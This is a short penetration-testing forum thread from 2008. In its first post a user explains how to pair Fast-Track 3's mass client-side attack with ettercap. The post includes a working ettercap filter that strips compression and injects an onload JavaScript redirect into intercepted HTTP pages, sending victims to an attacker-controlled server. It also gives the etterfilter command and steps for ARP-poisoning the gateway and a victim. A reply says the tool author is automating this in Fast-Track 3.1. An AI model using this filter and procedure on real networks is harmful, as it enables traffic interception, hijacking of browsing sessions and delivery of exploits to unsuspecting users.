Results 1 to 2 of 2

Thread: Fast-Track 3 Client Side & Ettercap Redirection

  1. 05-30-2008, 09:19 PM #1
    drwalter
    drwalter is offline
    Junior Member drwalter's Avatar
    Join Date
    Mar 2008
    Posts
    88

    Default Fast-Track 3 Client Side & Ettercap Redirection

    I just installed Fast-Track 3 on Bt3 Beta and figured I'd share on a simple way to capitalize on the Client Side attack function using ettercap to redirect websites on your network to your apache server.

    If you haven't already installed the new Fast-track 3.0 here's the thread with the link(BTW AWESOME job Relik!). http://forums.remote-exploit.org/sho...track+3&page=2

    First you'll need to create a filter(filename.filter) to convert using etterfilter and insert a code which will allow you to redirect traffic to your webserver. For simplicity's sake, I just pulled one off our forums from this thread posted by hawaii67 which redirects all web traffic to a certain site. But you could just as easily edit it to a specific website.
    http://forums.remote-exploit.org/sho...tercap+filters

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("changed Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<BODY", "&#x000D<BODY onload=\"javascript:document.location.href='YOURAPACHESERVERHERE'\"><XSS a=");
replace("<body", "&#x000D<body onload=\"javascript:document.location.href='YOURAPACHESERVERHERE'\"><XSS a=");
msg("Filter Ran.\n");
}
    Next you'll need to run the file through etterfilter

    #etterfilter filenamehere.filter -o filenamehere.ef

    run fast-track.py (make sure you're running 3.0 not 2.3 or lower) and start up the mass client side attack making sure to specify your own ip.

    After this either use text or gui interface for ettercap to scan for hosts then specify the default gateway as target one and the victim machine for target two. Load the filter and begin arp poisoning.

    Now get on the victim machine (or be lazy and vnc in) and go to a website and you're done!
    ================================================== ===
    Dr. Walter - Depraved linguist, Benevolent troublemaker extraordinaire
    ================================================== ===
  2. 06-02-2008, 08:52 AM #2
    imported_relik
    imported_relik is offline
    Member
    Join Date
    Feb 2006
    Posts
    167

    Default started

    I've started incorporating this into Fast-Track 3.1, should be able to do all of this from the command line, tricky part is automating what the gateway is, i can either pull from ifconfig or manually specify one... Not sure how I want to do this yet, but is kind of working right now
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules